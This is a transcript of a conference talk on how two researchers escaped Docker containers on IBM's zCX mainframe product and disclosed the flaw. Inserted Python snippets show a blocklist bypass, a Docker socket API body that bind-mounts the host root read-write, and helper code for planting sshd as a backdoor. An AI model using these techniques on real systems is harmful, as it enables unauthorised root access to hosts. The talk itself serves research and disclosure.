- Hi, I’m Ian. I do container things.
00:04 - - Hi, I’m Chad. I do mainframe things.
00:07 - - And we’re here to tell you a story today about some things we did together.
00:12 - We both live in Minneapolis, Minnesota, which is a cold dark place, where it’s winter six months out of the year.
00:19 - Minnesotan hackers spend their long winters stuck inside, doing deep dives, studying ancient arcana and getting good at deep magic, which lends itself well to weird specializations, and that's how we ended up here.
00:33 - It all began in spring 2019. Like many good things, it began with a shit post.
00:40 - A person involved in DevOps said Kubernetes is the next mainframe.
00:44 - So of course, I tagged Chad and was like, what do you think? I'm not qualified to speak on mainframes.
00:50 - I’m about as qualified to speak on mainframes as I am on beekeeping.
00:53 - I think I’ve gotten a little better at it since, but anyway, a few days later- - A few days after that shit post, we met at a local con for the first time in-person and talked about our niche specializations, the similarities and differences between them.
01:09 - Although our worlds don't usually overlap, the cultures are different, the timeline is different, I mean, mainframes have been around since the 50s and Kubernetes has been around for like what? Six or seven days? Our approaches had some similarities and we both knew we had some knowledge in common.
01:25 - In the mainframe world, it’s not uncommon to patch the systems maybe once, twice a year.
01:31 - - And in the DevOps world, people do multiple deploys a day.
01:34 - Culturally, it’s really different. DevOps people are really open to new things, open source software, really excited about doing things quickly and doing new stuff and mainframes, maybe not so much.
01:44 - - No one would ever accuse the mainframe community of being excited about change.
01:49 - - Fair enough. - Both of us had experience pulling things off that other people said were completely impossible in our respective fields.
01:56 - We figured out how to navigate an uncharted territory.
01:59 - We took apart technology without dedicated tooling and with little or no prior art.
02:05 - - We did have some things in common though.
02:06 - We had shared knowledge of Linux hacking, which ended up becoming helpful for this project later because containers are made out of Linux features and mainframes use Unix filesystems too.
02:16 - We joked about whether or not we really could prove that guy wrong, about Kubernetes being the next mainframe, but I didn’t really think we would ever get to do our thing together because honestly, who puts containers on a mainframe? Well, the joke was on me because just a few months later, in fall 2019, IBM announced z/OS Container Extensions, which we will be referring to from here on out as zCX.
02:41 - So we made it into a winter project. Joining forces and combining our very specific particular sets of skills, we were able to become the first people on the planet to escape a container on mainframe, and that was just getting started.
02:55 - This talk is about how we did that. It’s a talk about friendship, collaboration, cross-disciplinary skill sharing and figuring out how to escape containers on the moon.
03:04 - But first, a couple of things. - It would violate the laws of physics and math to fit all of the technical background that Ian and myself had about our two niche disciplines into the amount of time that we have for this talk.
03:17 - However, we have not yet figured out how to do this, but we're making a lot of progress and we'll make a note of it for future talks.
03:24 - So we’re not doing that today. We encourage people that are interested in finding out more to check the resources in our reference sections, or if you’re seeing this in-person come around and ask a question.
03:35 - There’s a lot of ways to attack this thing that we’re not gonna be covering today, but we reserve the right to not answer questions about those.
03:43 - - If you're not here in-person and you're watching this virtually now or later, we're around the interwebs too. You can probably find us, probably on Twitter.
03:49 - - Probably Twitter, yeah. Speaking of which, we disclosed this to IBM and IBM sent us a formal statement about it.
03:58 - To our knowledge, this is unprecedented. So we figured we would share it here.
04:02 - ‘Cause it’s from IBM. - Yeah, I’ve disclosed vulnerabilities to IBM in the past and friends of mine have also disclosed vulnerabilities to IBM, specifically, for System Z and they never get talked about publicly.
04:14 - This is fantastic, I really appreciate this, and I hope they do this again in the future.
04:19 - - So yeah, that was pretty cool. Anyway, let’s get to it.
04:23 - So what is this thing? Containers on a mainframe? What? That’s weird.
04:30 - - First off, let’s do some myth-busting. Mainframes still exist, they’re widely used and the tech is more modern than you think.
04:37 - Unix (AIX) has been ported to and running on mainframes since the early 90s, and now there are actual containers that run inside an address space on IBM's most prevalent mainframe OS, z/OS.
04:50 - Every one of you used a mainframe today, or in person on the way here: if you ran a credit card, if you went to an ATM, if you took an airplane, you used a mainframe.
05:02 - IBM's product name for this is zCX. I'll explain what that is, but first, let's do some super basic mainframe primer.
05:10 - The mainframe we’re referring to today is IBM’s flagship System Z.
05:16 - The operating system is known as z/OS. Sometimes it's still called MVS by us old timers.
05:22 - It runs most of the mainframes on the planet and it runs a unique architecture called z/Architecture.
05:28 - Within this OS, the basic unit of user or process separation is known as an address space.
05:34 - zCX is a custom hypervisor, which emulates z/Architecture and runs in its own address space on z/OS.
05:42 - Atop zCX, there is a customized barebones Linux image running Docker containers.
05:48 - IBM hardened this image and created a custom Docker plugin to support a secure Docker base install, which allows the user to create and manage containers.
05:58 - So, Ian, what’s a container? - [Ian] What is a container? First of all, let’s talk about what it’s not.
06:06 - A container is not the same thing as a virtual machine.
06:09 - Containers don’t have their own kernels or standalone resources, at least most of the time.
06:14 - Containers share resources with each other and with their hosts, and unlike a virtual machine, if you kill a container process, you kill the entire container.
06:22 - Docker is the most common container engine, but it’s not the only one, and they can vary pretty widely in implementation and behavior.
06:28 - Some of them even have hypervisors. zCX does use Docker though, so that’s what we’re going to be talking about today.
06:34 - This isn’t the first time Docker containers have been run on mainframe computers.
06:37 - Docker has been running on bare metal Linux instances on mainframes for a minute, but that’s just plain Linux.
06:42 - zCX is different because it’s the first time containers have been run on z/OS.
06:48 - But what is a container anyway? Well, a container isn’t really a thing at all.
06:53 - They’re basically a set of native Linux features that are put together in order to isolate a process.
06:58 - These features are cgroups and namespaces. Cgroups determine what resources a process is permitted to use, like CPU and memory.
07:06 - Namespaces determine what a process is permitted to see, like directories and other processes.
07:11 - Together, cgroups and namespaces make up what we call a container, which is really just an isolated process.
07:17 - Containers as a concept don’t really exist in the Linux kernel.
07:20 - As far as the kernel is concerned, a container is no different than any other process running on the host.
07:26 - What this also means is that you can look at a container process like you could any other process on the Linux host.
07:31 - For this demo, we’ve already escaped to the zCX host, so we’re looking from there.
07:37 - So let's run a container with the name honk and the command sleep 1312.
07:41 - The honk isn’t really necessary here, I just wanted to honk at you.
07:44 - If we list our containers, we can then see that container running.
07:48 - We can see this or any other container on the outside by running a PS command, which will show us containers running on the host alongside other processes.
07:56 - This command output will give you the process ID, the user running it, the PID namespace number and the command line argument.
08:02 - If we want to take a look at the inside of the container, we can do so by looking in the /proc/<PID>/ns folder for the process ID of that container.
08:10 - We found the PID of the container we just created in the PS command output we just ran.
08:14 - Let’s take a closer look. We take a look here, we can see the cgroup at the top and the other namespaces on the bottom.
08:21 - All processes on Linux are made up of these namespaces.
08:24 - As of kernel version 5.6, there's also a time namespace, but zCX runs an old-ass kernel, so this demo won't show you that one.
08:31 - Depending on the configuration and how the container was created, some of these namespaces might be shared with the host and some might be unique to the container.
08:38 - We’re not going to get into that here, but I recommend checking out the resources in the reference section to learn more.
08:44 - And that’s it. Honestly, that might be the closest thing you’re ever going to be able to get to being able to actually look at a container because that’s all a container is, a process made up of cgroups and namespaces.
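The inspection walked through in this demo can be sketched in a few lines of Python. The parsing helper is ours, but the /proc/<PID>/ns symlink layout is exactly what the demo reads (here against our own process, since that always exists):

```python
import os
import re

def parse_ns_link(target):
    # A /proc/<PID>/ns entry is a symlink whose target looks like "pid:[4026531836]":
    # the namespace type, then the inode number identifying that namespace.
    name, num = re.fullmatch(r"(\w+):\[(\d+)\]", target).groups()
    return name, int(num)

# On a Linux host, list the namespaces of this process (or any PID you can see).
# Two processes sharing a namespace show the same inode number here.
if os.path.isdir("/proc/self/ns"):
    for entry in sorted(os.listdir("/proc/self/ns")):
        print(entry, parse_ns_link(os.readlink(f"/proc/self/ns/{entry}")))
```

Pointing this at a container's PID instead of `self` gives you the same view the demo showed: the container is just a process whose namespace inodes differ from the host's.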
08:56 - Because containers do share resources with one another and their hosts, containers present a wide and varied attack surface: if a container is compromised or misconfigured, containers can compromise each other and their hosts.
09:07 - I just think they’re neat, they’re fun to break.
09:09 - So let’s talk about breaking some. So how to break this thing anyway.
09:16 - We approached zCX from both ends using our respective knowledge and skill sets, and we ended up taking zCX completely apart from both the container side down into the mainframe and the mainframe side up into the containers.
09:29 - But first, before we did anything else, Chad set up a lab in the cloud.
09:32 - - It’s true. It was a complicated lab and it took a while to get it going.
09:37 - Let me explain. We had to build a cloud-based z/OS environment with the latest zCX code release.
09:44 - We used IBM’s zPDT that stands for z Personal Development Tool.
09:49 - It’s a virtualized platform that emulates z hardware and runs atop Linux.
09:55 - On top of the zPDT, we loaded the newest z/OS version, fully patched it and we’re able to install and run zCX in the cloud.
10:03 - So it looks a little bit like this. Atop Linode, which is a hosting provider, we run a Linux instance.
10:09 - Running on that Linux instance is zPDT. On top of the zPDT hypervisor is z/OS.
10:16 - Within z/OS, there’s an address space, which runs the zCX hypervisor.
10:21 - Atop that runs a Linux instance, and in that runs Docker in Docker, and that's our research environment, simple.
10:29 - - Something along those lines, yeah. So, but to really be able to attack this, we needed to level up our skill sets.
10:38 - So we started out by cross-training each other.
10:40 - We set aside time to share skills and get each other up to speed enough to be dangerous because for me, I didn’t really know how to do anything with a mainframe.
10:49 - - I couldn’t spell Docker. - But you’re good.
10:53 - And so, we needed a little bit of help getting each other up to speed.
10:57 - So we started doing that. First thing, I took Chad’s Evil Mainframe class.
11:03 - Chad’s a really good teacher. It’s a really good training.
11:05 - If you ever get the chance, I recommend it.
11:07 - It's offered at such cons that you may or may not have heard of, like BlackHat, every once in a while.
11:12 - So the training is multiple days long. It goes over the history of mainframes, how everything works and there was a CTF at the end.
11:19 - It was really good, I had a really good time with that.
11:21 - Mainframes were brand new to me. I had never touched one before.
11:25 - I had never really had an occasion to. I’m used to bleeding edge cloud native tech stacks.
11:30 - That old stuff never really comes into play for me at work, and while Unix system services felt familiar enough, the older stuff was wild.
11:38 - I had never seen or dealt with architecture like that before.
11:40 - It was so foreign to me, it might as well have been made on the moon.
11:44 - I learn in systems. So it took me a little while longer to ramp up at first, until I figured out how the whole thing works together.
11:50 - Chad was very patient with this. I did get there eventually.
11:54 - I still got the mainframes though. - Don’t let Ian fool you.
11:57 - They picked up mainframes super fast, as good as anyone I’ve seen.
12:03 - The next thing was for me to train up on containers, and Ian helped me do the Secure Kubernetes CTF.
12:09 - I’d done only a little bit of work on Docker before, generally with CTFs and the like.
12:15 - It’s always seemed like a little bit of magic to me.
12:18 - Working with Kubernetes and Docker in the Secure Kubernetes CTF really helped me make some sense out of it.
12:24 - It did bring me back to my beginning mainframe days.
12:27 - I mean, this is complex and a really steep learning curve of a bunch of abstract concepts.
12:34 - I still put my overall understanding of Kubernetes at like 5% maybe and containers somewhere in the neighborhood of maybe 30%, but working side by side with Ian has really helped me.
12:46 - They always stopped to take the time to answer my questions, very detailed answers and examples.
12:52 - I definitely would not have wanted to embark on this without their guidance and patience.
12:58 - - Don’t let Chad fool you either. He took right to it because he already had a base of Linux knowledge and because containers are made out of Linux internals and container orchestration is made out of containers, he was up and running really fast.
13:11 - It was really fun to watch, and it was really fun to get to come up with a curriculum to train you ‘cause I’m not a professional trainer.
13:17 - That wasn’t really something I had done before, so it was cool to like come up with one for ya, to teach you everything, or at least some of the things.
13:24 - Anyway, so after we had trained each other up, we took our new skills and our existing knowledge and started taking a look at the product.
13:31 - Working together but separately, we looked at our respective spaces.
13:35 - I looked at the containers. - And I looked at the mainframes.
13:39 - - And we tried to figure out how to get into it.
13:42 - - On the mainframe end, I started with the initial provisioning of zCX.
13:47 - This is where the primary image files live in the Unix subsystems on the mainframe.
13:52 - This is where you initiate zCX. You provision it, and thus all of the artifacts that might be interesting to us are stored here.
14:02 - I offloaded these files used to build the root zCX filesystem to a Linux box, and then I could take them apart with the proper tools.
14:10 - I fired up my exotic hacking tools like strings.
14:14 - I quickly discerned that the core of this image had two main parts: a whole bunch of Bash scripts and a bunch of Linux disk images.
14:23 - I extracted and examined these Bash scripts alongside the job log, which shows messages as zCX launches.
14:31 - Immediately, I noticed that the scripts all had debugging outputs, but that none of the debugging outputs were showing up on the job log.
14:38 - What to do? Well, going back to the Bash scripts, I looked and there was this super helpful line near the top of the first bootloader script that gave away the secret.
14:47 - Uncomment this line to enable debugging output.
14:49 - Thanks developers, who said being a hacker was difficult? All you have to do is just learn how to read.
14:56 - So I patched this binary, put it back on the mainframe and re-provisioned a new zCX, fabulous.
15:03 - The job log spit out all of the debug for all of the bootloader stages.
15:08 - There were so many messages though about keys and decryption.
15:12 - My interest was piqued and the hunt was on.
15:16 - I patched the Bash script up again and started looking for the initial decryption keys.
15:21 - I used the tried and true hacker skills of echo privatekey.pem, and I dumped the first of several encryption keys to the job log.
15:28 - However, I couldn’t fully reverse the filesystem yet because despite being able to echo these keys in the initial bootloader processes to the job log, I couldn’t actually find the keys in the filesystem.
15:41 - It’s a pretty complex setup. So I could copy the keys one by one out of the job log, but this is a colossal pain in the ass.
15:49 - For the moment, I was stuck and I turned it back over to Ian.
15:52 - - So looking at the container set up, I immediately saw some things that looked promising.
15:57 - First of all, the initial user was in the Docker group, which is a security hole so fundamental, it literally comes with a warning label on every new install on z/OS.
16:07 - Somebody had to have seen this label and actively ignored it.
16:10 - Wow, okay. So, sweet, this looks good.
16:14 - Moving on. The container setup that zCX has was Docker in Docker, which has known security holes, especially in certain configurations.
16:27 - There are a couple of approaches to Docker in Docker.
16:27 - It can mean running the Docker daemon inside a container running inside another container, or it can mean running only the Docker CLI or the Docker SDK in the container and connecting it to the Docker daemon on the host.
16:40 - zCX has a setup like the latter one. The approach to Docker in Docker that zCX uses has a few known drawbacks and some known security holes, because in this setup, the container running the Docker CLI can manipulate any containers running on the host.
16:56 - It can, for example, remove containers, it can create privileged containers that allow root equivalent access to the host and zcxauthplugin, which was part of their security model, tried to account for this, but it didn’t quite work entirely.
17:14 - Wait, what? I hadn’t mentioned zcxauthplugin yet.
17:17 - What’s up with this? Let’s get there.
17:19 - So I had looked at this and realized pretty quickly that it wasn’t completely wide open.
17:25 - My first attempts were the most bog-standard kind of thing: okay, can I run a container that is privileged in here? Can I execute a command as root? That kind of thing. They were blocked by this Docker authorization plugin that they were using, called zcxauthplugin.
17:40 - Zcxauthplugin did a few different things: it blocked privileged containers, blocked executing commands as root, and it also blocked mounting the host path as a read-write (indistinct).
17:49 - Okay, fair enough. But I knew there had to be a way to get into this, because honestly, just look at that setup and I wanted to figure out how the thing worked.
17:56 - So as I do, I went to the docs and as they often do, the docs pointed the way, quite literally.
18:05 - IBM helpfully listed all the security restrictions on the product, telling us all the things that we were not allowed to do because they adversely affected security features or may compromise the product.
18:16 - Well then, thanks IBM. I appreciate the tips.
18:20 - I was clearly going to have to try all of those immediately.
18:23 - The language in the docs at the time claimed that it was not possible to become root or access or modify the Linux host, but I knew that it was possible because they gave enough information that way about their system to tell me so.
18:36 - Here’s why. For one thing, what zcxauthplugin blocked gave me very specific error messages.
18:43 - For another thing, the commands they were blocking through zcxauthplugin were very specific, which pointed to a specific set of system configurations, and also to the possibility that they might be blocking through pattern-matching regexes.
18:56 - Really? This was like trying to prevent SQL injection by banning the string OR 1=1 without banning other things like, for example, AND 1=1, or parameterizing queries on the backend, or anything else you would do to deal with SQL injection.
19:13 - Even if it were possible to prevent all attacks by trying to block known bad syntax, which I think the people here can probably guess it's not, because there are lots of ways to bypass that, it was also immediately clear upon looking at this that there were a lot of options they missed, many of which were security relevant.
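A minimal sketch of why syntax blocklists fail, using the SQL injection analogy above. The blocklist pattern and the queries are made up for illustration; the point is that blocking one known-bad string says nothing about all its trivial variations:

```python
import re

# Hypothetical blocklist filter, the kind of pattern matching a blocklist-based
# plugin appears to do: reject anything matching a known-bad string.
BLOCKLIST = [re.compile(r"or\s+1\s*=\s*1", re.IGNORECASE)]

def naive_filter(query: str) -> bool:
    """Return True if the query is allowed through the filter."""
    return not any(pattern.search(query) for pattern in BLOCKLIST)

# The canonical payload is caught...
print(naive_filter("SELECT * FROM users WHERE name = '' OR 1=1 --"))   # False: blocked
# ...but an equivalent variation sails right past the blocklist.
print(naive_filter("SELECT * FROM users WHERE name = '' AND 1=1 --"))  # True: bypass
```

The fix in the SQL world is parameterized queries, not a bigger blocklist; the same lesson applies to blocking container options by string matching.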
19:32 - And in fact, going through the docs, it became obvious pretty quickly that maybe the folks who were developing this thing were a little newer to containers.
19:41 - Another page in the documentation had a section on restrictions on bind mounts, which said that you couldn’t mount host resources.
19:48 - Okay, I already knew that the plugin tried to block that one.
19:52 - It also mentioned that /var/run/docker.sock was read-only.
19:56 - Oh, that was the key to the front door. Let’s talk about the Docker socket for a minute.
20:04 - The Docker socket is a known security hole, if you leave it exposed, to, for example, users in the Docker group.
20:13 - This gives that user root equivalent access to the host.
20:16 - And read-only for the Docker socket is not a security boundary for a couple of reasons.
20:22 - One, you can make a whole volume read-only and all of the files in a folder read-only, and that doesn’t actually affect sockets because sockets don’t work that way.
20:31 - Also, the Docker socket in particular has an API layer that you can make calls to and an entire Docker Engine API for commands that you could execute to it while making those calls.
20:41 - And in the commands that the docs had mentioned blocking, they didn’t mention any of the syntax around the Engine API at all.
20:52 - So I made a cURL call, creating a new container that mounted the host path as a read-write bind mount via Engine API syntax.
21:00 - And hey, it worked. So I knew that making calls could work and that binds was an option they missed.
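A sketch of the kind of Engine API request body involved here. HostConfig.Binds is a real Docker Engine API field on the containers/create endpoint, but the image name, paths, and the curl invocation in the comment are illustrative assumptions, not the exact call we made:

```python
import json

# Hypothetical body for POST /containers/create on the Docker Engine API.
# The blocklist was matching CLI syntax like "docker run -v /:/host:rw",
# but nothing was checking the equivalent raw API payload.
body = {
    "Image": "ubuntu",
    "Cmd": ["sleep", "1312"],
    "HostConfig": {
        # Read-write bind mount of the host root filesystem into the container.
        "Binds": ["/:/host:rw"],
    },
}
payload = json.dumps(body)
print(payload)

# Sent with something along the lines of:
#   curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" \
#        -X POST -d "$payload" http://localhost/containers/create
```

The same trick applies to other HostConfig fields the CLI blocklist covered: the API spells them differently, so a string match on CLI flags never fires.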
21:06 - Sweet. But when I tried shooting out into the host system, it didn't quite work the way that I wanted it to, because they had enabled user namespace remapping.
21:14 - What this means for my purposes is that once I was out of that namespace, even though it said I was root, I couldn't really do anything meaningful in that namespace, and they had locked down the (indistinct) file real hard, which was throwing weird permissions errors that I hadn't seen before.
21:28 - So that was kinda odd, but okay, maybe this one wasn’t gonna work, but at this point, I knew I was getting somewhere.
21:36 - I'm gonna take a second here to explain user namespace remapping because it's important.
21:40 - Linux namespaces provide isolation for running processes.
21:43 - They limit their access to system resources without the running process being aware of the limitations.
21:49 - You don’t want to run your containers as a root user generally.
21:53 - It is not a secure thing to do, but sometimes for various system reasons, you get a container in which something has to run as root.
22:00 - So for those containers whose processes have to run as the root user within the container, you can remap this user via username space remapping to a less privileged user on the Docker host.
22:09 - The mapped user is assigned a range of UIDs, which function within the namespace as normal UIDs from 0 to 65535, but they have no privileges on the host machine itself.
22:19 - This was why, even though I was theoretically running as UID zero, I couldn’t really get anywhere.
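The remapping arithmetic can be sketched like this. The entry format follows /proc/<pid>/uid_map (inside start, outside start, length); the 100000 base is an illustrative dockremap-style offset, not necessarily what zCX uses:

```python
# A sketch of how user namespace remapping translates UIDs.
# Each map entry says: UIDs [inside, inside+length) in the namespace
# correspond to UIDs [outside, outside+length) on the host.
REMAP = [(0, 100000, 65536)]  # hypothetical single-range mapping

def remap_uid(container_uid: int, uid_map=REMAP) -> int:
    """Translate a UID as seen inside the container to the host UID."""
    for inside, outside, length in uid_map:
        if inside <= container_uid < inside + length:
            return outside + (container_uid - inside)
    raise ValueError(f"uid {container_uid} is not mapped on the host")

print(remap_uid(0))     # container "root" is really unprivileged host UID 100000
print(remap_uid(1000))  # an ordinary container user lands at 101000
```

This is exactly why UID zero inside the container got me nowhere on the host: the kernel was treating my "root" as host UID 100000-something.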
22:25 - So knowing that the API calls could work to the Engine API, but that username space remapping was kinda cramping my style, I figured I’d try something else.
22:35 - I tried the user namespace host option through the API, because setting the user namespace to host takes you out of user namespace remapping.
22:42 - This option was blocked by the plugin when I had tried it before in a Docker run command, but via the API it worked.
22:49 - And this time when I got in, I had full root access to all the host resources.
22:55 - Wow, this system really needed more defense in depth and appeared to have been built upon the assumption that no one could ever become root on the host.
23:03 - What? They really believed their own propaganda, so nothing was really locked down on the backend by that point.
23:09 - Once you were in, and once you were root, you could really do whatever, and it was kinda fun actually.
23:15 - I haven't really had that much fun running around an environment since early Kubernetes, which was similarly not locked down, and I hadn't gotten to do that in a while since Kubernetes improved, so that was fun for me.
23:27 - Anyway, the first thing I did once I had access to the host filesystem, was looking inside the Root folder because, why not? And in the Root folder, there was another folder called Root Keys.
23:37 - Well, that sounded great. Obviously, there was gonna be something interesting in Root Keys, so I took a look in there and I found a private key called IBM Encapsulation Private PEM.
23:48 - Didn't quite know what that was, but I figured Chad probably would, so I went and handed it to him, figuring it might be useful.
23:55 - Chad then took the key, reverse engineered the COBOL or something, and then we had a system to look at.
24:01 - - Right. So it wasn’t exactly COBOL, but it was pretty complex.
24:06 - - So it was like a Fortran, right? - Exactly, it was Fortran.
24:08 - Thank you. - It was not Fortran. - Ian had found the key that I was looking for, and once I had the key, I could finish reverse engineering the root filesystem and then I was able to look at this in more depth.
24:20 - The root filesystem bootloader processes are a myriad of LUKS-encrypted filesystems, initramfs filesystems, wrapped encryption keys and a whole bunch of scripts putting it all together.
24:34 - After parsing it all and reassembling the unencrypted filesystems on my Linux box, I had a moment and realized what this was.
24:43 - This is IBM’s secure service container, or as it used to be called, z Appliance Container Infrastructure, zACI.
24:50 - IBM Secure Service Container is an offering that they sell for Linux, LinuxONE where it runs directly on bare metal IBM mainframes as a secure appliance.
25:02 - The filesystems were littered with these acronyms.
25:04 - It dawned on me that what they had done was taken this, and this is why there was this wild maze of keys and encryption and scripts.
25:12 - They lifted this SSC, which normally has its initial decryption keys inside a hardware security module, and ported the whole thing to software on a disk.
25:22 - IBM normally builds these hardware enclaves, but it’s harder to do that in the cloud.
25:27 - - As it turns out you can’t actually lift and shift things into the sky.
25:33 - What we were coming to find out is that the security model in zCX was a combination of mainframe and container security models, and a combination that worked in kind of interesting ways.
25:42 - Since containers share resources with each other and their hosts, security for containers requires a holistic approach.
25:49 - Any given container system is only as secure as any given part of the stack, really, every part of the stack.
25:56 - You have to have defense in depth in every layer on a container system.
25:59 - Containers are literally made out of layers, but that means that you not only do you need to, but that you can do every little bit at a time.
26:09 - - This is a somewhat different security model than the one on a mainframe.
26:13 - The mainframe security model is really granular.
26:15 - You can configure security on literally anything on the mainframe, however, it's also a monolith in its security model and it can be very binary, like a light switch.
26:26 - Defense in depth on the mainframe can be really difficult if you have made any security configuration errors that would allow you to basically bypass all of the security controls because you screwed up one or two really key important things.
26:39 - - I think those are wild. - They’re wild.
26:43 - - So the differing approaches of these two security models came into play in the way that zCX got built, and the two combined in somewhat unexpected ways, which led to some unexpected behavior for both of us.
26:59 - So we worked together, passing things back and forth.
27:03 - Whenever either of us ran into the limits of our knowledge, or saw something that didn't really make sense in the respective contexts we were used to, we would pass the problem to the other person, who would recognize it from their own knowledge and context, and then we would do it again.
27:17 - So back to the container system, and in there I had full root access, but I was having a hard time understanding some behavior that I was running into.
27:25 - The Docker service kept throwing these weird Systemd errors I hadn't seen before, and my debugging tools weren't really helping me figure out why.
27:33 - I wasn’t really sure what was up with this.
27:35 - - Meanwhile, on the mainframe side of things, I found this directory in /etc/systemd/ that had these weird permissions on it, 644, which any of you Linux people will know is kind of odd for a directory, because the execute bit isn't set.
27:52 - I found this because I was copying it from a Linux box to another directory and my copy command threw an error because it couldn't copy that directory.
28:00 - Why would you want a non-executable directory? I’d never seen this before.
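For the Linux people following along, here's a quick sketch of what mode 644 means on a directory; the missing execute (search) bit is what made that copy fail:

```python
import stat

# 644 on a directory: read/write for the owner, read-only for group and other,
# and no execute (search) bit anywhere. On a directory, x is what lets you
# traverse into it; with r but no x you can list the names inside, but not
# actually reach (stat, open, copy) the entries.
mode = 0o644
print(stat.filemode(stat.S_IFDIR | mode))  # the ls -l style rendering
print(bool(mode & stat.S_IXUSR))           # False: even the owner can't traverse
```

That's why 755 or 700 are the usual directory modes, and why a 644 directory is the kind of thing a mainframe person has never seen and a copy command chokes on.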
28:03 - I showed this to Ian with a comment about how strange I thought this was.
28:07 - - Oh, huh, okay. This partly explained the errors that I had been getting with the Docker service, that I hadn't been able to figure out. Sort of.
28:15 - The permissions bit made sense in a container context.
28:17 - 644 are actually pretty standard permissions for the Docker service, for compliance reasons, but this particular service didn’t quite act the way that I would normally expect it to.
28:27 - The Docker service interacted with several other Systemd services.
28:30 - One of the services it was interacting with was called zcxauthplugin. service.
28:35 - So I took a look at that. I wanted to know how this plugin worked and whether we could disable it. Docker authorization plugins aren't super commonly used, but the ones that I had seen, which were open source, generally behaved in pretty similar ways.
28:49 - This authorization plugin was different. It was closed-source and it interacted with Systemd as a service in a way that I hadn’t seen before.
28:56 - It kept making these calls back and forth and running against a list of magic text strings.
29:02 - What the fuck? This wasn’t common behavior in container context at all.
29:06 - I had never seen such a thing. - Ian explained this to me and it occurred to me that what was going on here might have a similar corollary in the mainframe world, specifically mainframe exits.
29:19 - Let me explain. So within z/OS, there’s a concept of an exit.
29:24 - What an exit is used for is if you wanna do some really specific customization to some part of the system.
29:30 - An exit is literally a program that you write usually in Assembler or C, maybe C++, that is called from an API in some kind of system routine.
29:41 - So the way it works is, let’s take an example, a password processing routine.
29:46 - So Ian’s gonna change their password on the mainframe to sparkle.
29:49 - So they type in the password sparkle, and the mainframe then says, “Okay, that’s fine, but I see that there’s an exit defined for password compliance.” So it will call the program that I wrote, and in my program, the mainframe exit for password policy, I’m gonna check all kinds of things.
30:05 - Is this word part of the dictionary list? Is it the month? Is it the current year? Is it Ian’s name? Things like that the system wouldn’t normally check, and if it is okay, I’m gonna pass back a return code that says, “That’s fine.
30:19 - Ian can use sparkle.” Or if it’s not good, I’m gonna say not good, and I’m gonna make them change their password to something else.
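A toy sketch of the password-exit idea Chad describes (the word list is made up for illustration, and real exits are written in Assembler or C, not Python; returning 0 to accept and a nonzero code to reject mirrors common mainframe return-code convention):

```python
import datetime

DICTIONARY = {"password", "sparkle", "letmein"}  # stand-in word list

def password_exit(user: str, new_password: str) -> int:
    """Toy analogue of a z/OS password exit: 0 accepts, 8 rejects."""
    word = new_password.lower()
    if word in DICTIONARY:
        return 8                      # dictionary word
    if str(datetime.date.today().year) in word:
        return 8                      # contains the current year
    if user.lower() in word:
        return 8                      # contains the user's own name
    return 0                          # acceptable: the system applies it

print(password_exit("ian", "sparkle"))  # → 8, rejected, just like in the story
```

The system routine only sees the return code; all the actual policy lives in the exit, which is exactly the kind of hook the zcxauthplugin turned out to resemble.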
30:25 - So I explained this to Ian, and I said, I think what’s happening here is that the programmers who know how to write exits to modify and control system behavior have written an exit in the zcxauthplugin, and that’s how they’re trying to control the security of this product.
30:42 - - Wild. - Meanwhile, I was also looking at the zcxauthplugin, but I was looking at the binary.
30:49 - And the first thing that I noticed was that it was huge.
30:52 - I mean, listen, normally on mainframes, things are built with really tight Assembler code or C code; the binaries, even for super complex mainframe systems, are small.
31:04 - For example, take the nucleus on a mainframe, which is kind of like the kernel, the core bit that tells everybody what to do.
31:11 - It’s maybe 50 megs on the mainframe, and the zcxauthplugin is six megs.
31:17 - I started dumping it and looking at it with a hex editor and a disassembler, and there’s all kinds of calls in here to things that have nothing whatsoever to do with Docker or security, and I was like, what is going on here with this thing? So I went back to Ian and I said, what is this? What’s happening here? - This is what I knew: it was a Go binary.
31:38 - They’re thick like that. They have a lot of dependencies, they make a lot of extra calls; that’s normal for Go.
31:44 - At one point, I tried to Docker pull the image for Golang and I crashed our entire lab for disk space.
31:51 - Oops. I was unfamiliar with these kinds of size constraints because I’m used to Go, it’s big.
31:57 - And so, although I recognized the Go patterns in the code, which made sense to me, some of what that code was doing looked kind of weird.
32:05 - It looked unfamiliar in a way that, by this point, I had learned probably meant it was doing something weirdly mainframe-specific with a Golang thing I might otherwise be used to seeing.
32:18 - So at this point, I think we both knew this was clearly going to keep happening, and we were going to need to take a deeper look at the system together, but to get into the system as deep as we wanted to, we were going to need persistence and tools.
32:31 - - So we made a lab version of zCX and we ripped out all of the security features that IBM had left behind for us.
32:39 - We disabled the zcxauthplugin, we disabled user namespace remapping, we made all of the read-only mounts into read-write mounts, and we stored this filesystem onto a mainframe dataset.
32:50 - We added a debugger, we got APT up and running so we could update the software and install new applications and programs, and I even (I’m very proud of this) figured out how to make SSH run on the root filesystem by copying the sshd binaries and the corresponding libraries out of the Docker overlay filesystems and running them in the root filesystem, so we had a direct backdoor into the root filesystem and could commence doing a little bit deeper research.
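The sshd trick depends on gathering every shared library the binary needs before copying it out of the overlay. One way to do that is to parse `ldd` output; a hedged sketch (the helper and the sample output are ours, not from the talk):

```python
import re

def libs_from_ldd(ldd_output: str) -> list[str]:
    """Pull resolved library paths out of `ldd` output so each one can be
    copied alongside the binary. Typical lines look like:
        libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x...)
        /lib64/ld-linux-x86-64.so.2 (0x...)
    """
    paths = []
    for line in ldd_output.splitlines():
        m = re.search(r"=>\s*(\S+)\s*\(0x", line)       # "name => /path (addr)"
        if m:
            paths.append(m.group(1))
            continue
        m = re.match(r"\s*(/\S+)\s*\(0x", line)         # bare "/path (addr)"
        if m:
            paths.append(m.group(1))
    return paths

sample = """\
\tlinux-vdso.so.1 (0x00007ffd2)
\tlibcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x00007f1a)
\t/lib64/ld-linux-x86-64.so.2 (0x00007f1b)
"""
print(libs_from_ldd(sample))
```

Entries like the vDSO, which have no filesystem path, are skipped; everything else gets copied next to the binary so sshd can run outside its original container filesystem.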
33:18 - - We’re still doing more with that. So where do we go from here? Well, we have a to-do list as we’re still working on this project.
33:27 - We have a couple of obvious points to attack that we’ve already gathered some information about, and maybe some less obvious avenues that we won’t be talking about here.
33:35 - - One of my favorite things is disassembling and reverse engineering code.
33:40 - So disassembling the zcxauthplugin is something that I’m absolutely looking forward to.
33:45 - However, it’s written in Go, and it’s on an architecture that the usual tools were not really designed for.
33:52 - Let me explain. If you look at any of the open source tooling designed for mainframe, what you’ll see is the architecture listed not as zArchitecture, but as s390x architecture.
